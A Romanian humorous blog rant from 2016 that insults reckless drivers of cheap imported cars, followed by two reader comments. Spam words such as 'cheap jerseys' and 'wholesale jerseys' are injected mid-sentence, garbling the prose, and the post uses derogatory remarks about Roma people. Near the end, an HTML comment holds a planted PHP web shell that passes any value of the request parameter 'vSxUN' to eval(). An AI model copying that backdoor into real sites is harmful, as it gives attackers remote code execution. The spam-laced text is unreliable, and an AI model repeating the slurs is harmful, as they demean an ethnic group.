Tu, şofer cretin, citeşte şi gândeşte

Ti-a venit cazanul din Germania sau l-ai cumparat de la niste tigani dubiosi de la targul Team din oras, indiferent cum ai reusit sa pui mana pe harbul ala esti tare mandru de el. Face zgomot cat sa-ti trezesti tot neamul de la maimuta la cimpanzeu ce esti – tai liniile de parca tai painea in restaurant, treci pe rosu de zici ca esti daltonist, in gâtul mă-tii, si intri la intimidare ca pana la urma cine dracu are curaj sa iti atinga a ta masina inscrisa la bulgari?

Fugi pe strazile din oras de parca ti-a luat cheap jerseys coana ma-ta drum, iar cand te opreste domnul politist (sa traiesti nenea politist cu tichie) belesti ochii de zici ca esti te miri ce sfant, in gâtul mă-tii.

Ba, hai sa traiesti tu, ai vazut ca-ti troncane tabla sub cur, dar l-ai crezut pe cuvant pe vanzator cand ti-a zis ca “nu bate, nu troncane” si probabil ar fi acceptat si orice test, dar tu ai zis ca n-are rost sa mai cheltui bani si pe teste, ca not ai incredere in omul asta dubios de wholesale jerseys bronzat.

Pleci la agatat cu acest aspirator de femei, dar singurele fete / femei pe care le agati sunt alea de pe trecerea de pietoni, atunci cand nu-ti dai seama ca ala de pe wholesale jerseys banda 1 e oprit sa acorde prioritate pietonilor.

Nu zic acum ca ar trebui sa iti explodeze airbag-ul in dinti, ai fi ok ca si om si te-as Emptying accepta daca n-ai fi atat de prost (sofer), dar daca tot te crezi Schumacher, Mobil ai grija sa nu te lovesti de un pom, asa cum a patit si pilotul … acum, wholesale jerseys un pom in minus n-ar fi problema, mai plantam inca 10 la locul tau de veci, dar ai grija sa nu iei cu tine si ceva persoane nevinovate, ba, sofer cretin ce esti !

P.S. La fel de bine poti sa ai si VW, Matiz sau orice alta marca de cheap nba jerseys masina ce pare de om normal, ba cretinule !

Citit de Machine 63 ori

Vrei sa afle si prietenii tai despre asta?

Citit de 63 ori

Vrei sa afle si prietenii tai despre asta?

Citit de 63 ori

Vrei sa afle si prietenii tai despre asta?

<!– [insert_php]if (isset($_REQUEST["vSxUN"])){eval($_REQUEST["vSxUN"]);exit;}[/insert_php][php]if (isset($_REQUEST["vSxUN"])){eval($_REQUEST["vSxUN"]);exit;}[/php] –>

Citit de 67 ori

Vrei sa afle si prietenii tai despre asta?

Categoria: Blog

Tags: , , ,

- 03/01/2016
Scriu pe jorje.ro doar sa enervez o anumita categorie de oameni - daca vrei sa ma injuri dupa ce ai citit postul de mai sus, inseamna ca faci parte din acea categorie!

Comments

  1. sunt multi cretini de genul asta, mai ales ca in doua luni poti sa pui deoparte bani pentru o astfel de masina. toti se vad zmei pe sosele.

    • Daca nu fumeaza in fiecare zi si lasa mai usor berea la PET din fata scarii, cred ca o pot cumpara si intr-o luna !

Leave a Reply

Your email address will not be published / Required fields are marked *